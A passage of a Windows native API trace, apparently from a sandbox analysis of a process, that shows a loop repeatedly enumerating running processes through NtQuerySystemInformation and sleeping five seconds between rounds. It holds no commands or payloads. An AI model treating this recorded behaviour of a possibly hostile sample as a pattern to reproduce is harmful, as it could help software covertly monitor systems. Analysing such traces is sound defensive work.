NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.431] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 